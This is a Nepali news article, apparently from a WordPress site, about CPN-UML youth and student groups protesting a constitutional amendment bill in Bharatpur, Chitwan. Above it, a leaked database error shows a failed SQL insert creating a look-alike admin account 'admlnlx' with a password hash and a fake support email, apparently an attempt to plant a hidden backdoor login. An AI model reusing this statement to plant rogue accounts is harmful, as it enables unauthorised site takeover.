WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BD9SLWopIFsSU2DpJwJJkChSJ3OXL60', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-29 04:20:17', '', 'admlnlx', 'admlnlx')
चितवन,मंसिर १७-
सिमाकंन हेरफेरको प्रस्ताव विरुद्ध चितवनमा एमाले भातृ संगठनले आज (शुक्रवार) विरोध प्रर्दशन गरेका छन् । एमालेका युवा र विद्यार्थी संगठनहरुले भरतपुरमा प्रदर्शन गर्दै सिमाकंन हेरफेरको प्रस्तावको विरोध गरेका हुन्।
हिमाल पहाड तराइ कोही छैन पराइ, जनभावनाको कदर गर,संविधान संसोधन फिर्ता गर लगाएतका नारा लगाउदै युवा विद्यार्थी र्यालीमा सहभागि थिए । भरतपुरको चौविसकोठीवाट सुरु भएको र्याली क्याम्पसगेटमा पुगेर कोणसभामा परिणत भएको थियो ।कोणसभालाई युवासंघका केन्द्रिय लेखा आयोग संयोजक कमलराज पाठक,अखिल जिल्ला अध्यक्ष देव प्रसाद पाठकले सम्वोधन गरेका थिए । सम्वोधन गर्दै उनिहरुले संसोधन दर्ता फिर्ता नभएसम्म आन्दोलन जारी राख्ने चेतावनी दिएका थिए ।
संविधान संशोधन विधेयक राष्ट्रघाती भएको दाबी गर्दै एमालेका युवा र विद्यार्थी संगठनले बुधबारदेखि नै सडक आन्दोलन थालेका हुन् ।प्रमुख प्रतिपक्षी दल नेकपा एमालेले संसदमा दर्ता भएको संविधान संशोधन विधेयक फिर्ता लिन सरकारसँग माग गर्दै सडक र सदनवाट आन्दोलन चर्काएको छ । संसदमा दर्ता भएको संशोधन विधेयक राष्ट्रघाती भएको एमालेले ठहर गरेको छ ।